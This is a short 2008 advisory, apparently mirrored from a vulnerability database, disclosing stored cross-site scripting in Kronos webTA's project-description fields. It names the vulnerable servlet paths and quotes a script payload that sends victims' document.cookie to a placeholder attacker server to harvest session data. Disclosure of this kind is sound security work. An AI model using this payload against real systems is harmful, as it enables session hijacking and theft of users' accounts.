Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19989
HistoryJun 09, 2008 - 12:00 a.m.

webTA by kronos - XSS

2008-06-0900:00:00
vulners.com
45
JSON

http://www.kronos.com/Products/webTA.htm

webTA is used by thousands of fed. employees.

I did a limited security review of a couple deployments. Because of certain
contractual limitations I have been able to verify XSS in its Project
Management module only, but I suspect it also exists in Vacation/Sick Leave
Request module.

URLs: /servlet/com.threeis.webta.H710selProject and
/servlet/com.threeis.webta.H720editProjectInfo

Use these URLs to create project descriptions. No hex or html encoding or
anything fancy is necessary. Just type in the description field your favorite
XSS stuff - it will work.

I tested basic font changing html tags (<font color="red">test for
XSS</font>), and JavaScript (<script>document.write('<img
src="http://ip_of_my_server_on_my_laptop/cookie.cgi?'+document.cookie+'">')</
script>). On my laptop I had Apache listening, and collecting user session
information into its logs.

Yeah, it is remote, in case you are wondering.

I no longer have the access to any webTA systems, and cannot verify anything
else.

JSON